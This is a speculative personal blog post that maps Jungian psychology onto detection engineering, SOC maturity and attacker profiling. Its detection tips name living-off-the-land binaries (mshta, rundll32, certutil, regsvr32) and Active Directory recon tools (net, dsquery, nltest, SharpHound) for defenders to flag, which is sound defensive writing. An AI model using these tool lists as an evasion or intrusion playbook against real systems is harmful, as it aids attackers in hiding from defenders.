“Invoke-Shadow” — Applying Jungian Psychology to Detection Engineering
“Until you make the unconscious conscious, it will direct your life — and you will call it fate.” — Carl Jung
Before I begin this very odd post, let me be clear — even I am not sure what I came up with. This idea actually came to me as a dream that I could hardly remember.
I’ve always been drawn to weird analogies in cybersecurity — those odd, left-field comparisons that somehow unlock new ways of thinking about detection engineering. I even tried writing a post about the relationship between music theory and detection logic, but it didn’t quite land the way I hoped. And then… this came up.
As I followed the thread of my dream, I started thinking about the work of Carl Jung, the brilliant, before-his-time Swiss psychoanalyst who believed that human behavior follows deep patterns — unconscious, symbolic, archetypal. That we all carry within us a “shadow self,” that our dreams are not nonsense but messages wrapped in metaphor, and that beneath the surface, we share a collective unconscious of motifs and instincts. Then I realized… attackers often behave the same way.
Advanced threat actors don’t always operate in straightforward, logical patterns. They move nonlinearly, they hide intent behind symbols, they weave behavior that feels chaotic, disjointed, or even absurd — like dreams. They evade us not just by breaking rules, but by breaking the logic we expect.
And maybe that’s the point.
So in this potentially near-schizophrenic post, I want to explore what it means to analyze threat behavior the way Jung analyzed dreams, archetypes, and the unconscious. This won’t be a typical threat intel write-up — and it’s definitely not a textbook psychology essay. It’s a dive into what happens when you gaze at telemetry long enough so that the telemetry starts to gaze back at you, and shows you myth, motive, and metaphor emerge.
This post explores how Jungian concepts can reshape the way we do detection engineering — not as metaphor, but as a practical, tactical model for:
- Writing better detection rules
- Understanding attacker behavior
- Building mature, adaptive SOCs
- Seeing the unseen in your environment
Let’s get weird.
🌒 1. The Shadow → Detecting What No One Claims
The shadow is everything that the individual refuses to acknowledge about themselves.
In Jungian psychology, the shadow represents the parts of ourselves we repress, deny, or simply don’t see. It’s the unacknowledged self — often messy, hidden, or inconvenient. Psychologic literature and self-reflection teaches us that if you repress something long enough, it often explodes in malicious ways.
But the shadow isn’t evil — it’s just unknown.
In cybersecurity, the “shadow” takes many forms:
- Processes that run regularly, but no one knows why
- Admin accounts no one owns
- Scripts in
Startup
folders from ex-employees - Scheduled tasks created “by someone, years ago”
These artifacts aren’t necessarily malicious — but they operate outside collective awareness, and that makes them dangerous. Your goal? Bring them into the light.
We ignore them because they don’t throw alerts — but they still have access, run code, and persist.
These are not IOCs. They are psychological blind spots in infrastructure.
🧪 Detection Concept: Shadow Analytics
Use your EDR or SIEM to ask:
- Which accounts haven’t logged in for 90 days — but still exist?
- Which binaries have executed more than 5× but have no publisher or digital signature?
- What registry keys are set on 80% of endpoints, but not in any deployment baseline?
You’re not hunting malware.
You’re surfacing the unconscious behaviors of your network.
🧬 2. Archetypes → Behavioral TTP Templates
Archetypes are the universal, archaic patterns and images that derive from the collective unconscious.
Carl Jung believed that human behavior isn’t random — it follows deep, universal patterns called archetypes. These are timeless roles we instinctively recognize: the Hero, the Trickster, the Magician, the Fool.
Sound familiar?
We already use something similar: the MITRE ATT&CK framework. It’s nothing short of amazing how advances in different fields often have their roots in universal behavior and thinking patterns — like a “super intelligence” that affects all of our technological breakthroughs.
Each MITRE technique is a behavioral archetype — a template. A script execution (T1059
) is a Magician casting a spell. Obfuscation (T1027
) is the Trickster playing a shell game.
But here’s the next step:
What if detection rules weren’t built for IOCs, but for archetypes of attacker behavior?

🔄 3. Individuation → SOC Maturity Through Integration
Individuation is the process of integrating the conscious and unconscious.
In Jungian thought (and echoed by Joseph Campbell’s Hero’s Journey), true growth comes not from staying safe, but from leaving the known world, confronting what’s hidden, and returning transformed.

That’s exactly what SOC maturity looks like.
A young SOC begins in the Ordinary World — basic rules, reactive alerts, fragmented telemetry. Then something triggers the journey: a breach, an audit, or the realization that detection coverage is mostly guesswork.
From there, the SOC enters the unknown:
- Parsing obscure logs
- Dealing with alert fatigue
- Correlating across systems
- Building its first threat hunts
This is the Initiation Phase — messy, nonlinear, full of friction. But through it, the SOC begins to develop its inner structure — integrating identity, behavior, time, and context into a deeper detection narrative.
Eventually, it returns to the “real world” as something more complete: Not a rule factory, but a system that can see across silos, adapt to threats, and detect intent, not just artifacts.
This is individuation: the SOC’s transformation into a whole, context-aware defender. Not just alerting — but understanding. The logs were always there. The story just needed a reader.
🌌 4. The Collective Unconscious → Shared Expertise
The collective unconscious contains the whole spiritual heritage of mankind’s evolution.
Carl Jung’s idea of the collective unconscious is the concept that all humans inherit a deep reservoir of universal knowledge, instincts, and symbols — a kind of shared psychic blueprint we all draw from, even if we don’t realize it.
In cybersecurity, we tap into our own version of this every day:
- Sigma rules shared on Github
- Threat intel feeds
- YARA repositories
- ATT&CK mappings
- Incident reports from other orgs
- The vast amount of knowledge and expertise shared on blogs or (X)Twitter
This is the collective unconscious of defenders — a pool of accumulated expertise, intuition, and behavioral understanding passed between teams, orgs, and generations of analysts.
But Jung would say: “That’s only the first step.”
To be useful, the archetypes from the collective unconscious must be made conscious — adapted to local context.
Don’t just copy Sigma rules — instantiate them.
Tune them for your logs, your tooling, your threats.
The same way the “Hero” archetype shows up differently in every story, the same behavior (T1059.001
) looks different in:
- A small org with no PowerShell logging
- A large enterprise with full telemetry
- An air-gapped ICS network
The archetype is shared. The expression must be individualized.
👤 5. The Persona → UEBA and Identity Drift
The persona is the mask one wears in society.
In Jungian psychology, the persona is the mask we wear to function in society. It’s the curated version of ourselves we show the world — adapted to expectations, roles, and norms. But underneath it lies the true self — more complex, sometimes contradictory, and not always aligned with the mask.
In cybersecurity, every user account operates with its own persona:
- Work hours
- Device usage
- Access patterns
- Application behavior
But when attackers compromise a user account (or an insider goes rogue), that mask slips. Therefore:
- Monitor for sudden privilege use
- Watch for geographic impossibilities
- Track time-of-day anomalies
- Detect tooling inconsistencies (PowerShell use by a non-technical persona)
This is identity drift — when the persona fractures, and true intent leaks through. UEBA (User and Entity Behavior Analytics) is a technical expression of this Jungian idea: tracking when a digital identity stops behaving like itself.
In detection, your job is to spot when the mask slips, because attackers don’t always bring new tools. Sometimes, they just borrow your face.
🧠 Behavioral Profiling in Detection Through Attacker Psychology
What if you could infer an attacker’s psychological profile by the way they move through an environment?
Not attribution.
Not OPSEC fails.
But something more human:
- Are they careful?
- Are they arrogant?
- Are they creative?
- Are they chaotic or methodical?
Just like law enforcement creates behavioral profiles of serial offenders based on choice of tools, victim selection, time of attack and clean-up behaviors, we can do the same using detection telemetry.
Let’s break them into psychological dimensions you can infer from detection data:

Let’s map a few example behaviors to psychological profiles.
👻 The Phantom
Low ego, high stealth, extremely cautious. Catch them through anomaly detection, not static matching. Their silence is the signal.
- Prefers the usage of LOLBINs
- Uses encoded commands and minimal file drops
- Rarely runs tools as SYSTEM
- Relies on existing access/persistence
- Leave very minimal signatures in the environment
🦍 The Brute
Loud, fast, and doesn’t care. Easy to detect — but the danger is speed, not stealth. Alert fast, isolate faster.
- Uses obvious, well-signatured tooling
- Operates with SYSTEM privileges from the start
- Tries multiple lateral movement technique in short bursts
- Clears logs sloppily
🎯 The Hunter
Focused, persistent, and exploratory. Flag recon commands outside red team windows. Look for correlated use of net
, dsquery
, nltest
, SharpHound
, etc.
- Performs deep recon: AD enumeration, GPO checks, user session review
- Slow, methodical credential access
- Operates during business hours to blend in

Every script, command line, and scheduled task is an expression of attacker intent:
- The fast ones are potentially insecure
- The quiet ones are scared — or practiced
- The clever ones want to be admired, even in silence.
We don’t just detect behavior. We profile it, we understand it and we make the unconscious, conscious.
Just like Jung would have wanted. 🧘🏽♂️💻
🌙 Dream Logic in Threat Behavior: Understanding Deception Through a Jungian Lens
“The dream is a little hidden door in the innermost and most secret recesses of the soul.”
In traditional cybersecurity detection, we rely on logic. Cause and effect. Parent and child. Input and output. However, some advanced attackers play by dream logic.
- They chain unrelated tools together
- They obfuscate intent behind absurdity
- They leave artifacts that don’t make sense — or make TOO MUCH sense
- They move through environments like dreams move through scenes — disjointed, nonlinear, symbolic
In Jungian terms, dream logic isn’t nonsense — it’s nonlinear, symbolic, and emotionally charged. In dreams:
- Things appear in the wrong place, but make emotional sense
- Symbols stand in for complex fears or desires
- Time, causality and identity are fluid
- Discontinuity is normal and meaningful
Translated to attacker behavior:
- You might see a legit system tool used for absurd purpose
- File paths that reference random, fake software
- Payloads that trigger from clipboard, wallpaper settings, or .lnk metadata
- LOLBins launching one another in recurvsive chains
That’s not broken logic. That’s deceptive logic — dream logic.

Just like in dreams, the things that seem too perfect — too mundane — might be hiding something deeper.
Is that scheduled task really from Dell Update Assistant?
Is that registry key really supposed to be named OneDriveUpgradeCheck
?
They may be symbols, not facts.
Attackers use dream logic because:
- It breaks linear analysis
- It hides payloads in symbols
- It disorients both analysts and detection systems
To counter it, we must become analysts of dreams — parsing out intent not just from commands, but from the storyline, the symbolism, and the structure of deception.
Detection is not just pattern matching.
It’s mythology, narrative, psychology, and intuition.
Fun idea — Detection Archetypes as Cards:
────────────────────────────────────
🃏 THE TRICKSTER
────────────────────────────────────
A master of deception. Changes form, evades detection, hides in known places.
🎯 Associated TTPs:
- T1027: Obfuscation
- T1140: Deobfuscate/Decode Files
- T1218: Signed Binary Proxy Execution
🧪 Common Tools:
- mshta.exe
- rundll32.exe
- certutil.exe
- regsvr32.exe
🛡 Detection Tips:
- Look for LOLBins with long, encoded command lines
- Detect mismatched parent/child execution chains
- Use entropy scoring on script contents
🔍 Behavior Profile:
- Indirect execution
- Short lifetime processes
- Often chains multiple LOLBins in sequence
Final Reflection: Jung for the SOC
The SOC is not a static engine. It is a living psyche.
If we listen to our environments like Jung listened to dreams, we can:
- Detect the shadow behavior our tools miss
- Recognize archetypal patterns across attacker playbooks
- Mature our capabilities through integration and individuation
- Use the collective unconscious as shared knowledge — not copy-paste
- Spot identity drift when users break from their roles

Further Reading
- My Notion page HERE. feel free to send me any further links you think fit here 🙂
- My Medium’s reading list.
- I recommend to start HERE.
If you enjoyed the article, feel free to connect with me!
https://www.linkedin.com/in/daniel-koifman-61072218b/
https://x.com/KoifSec
https://koifsec.medium.com/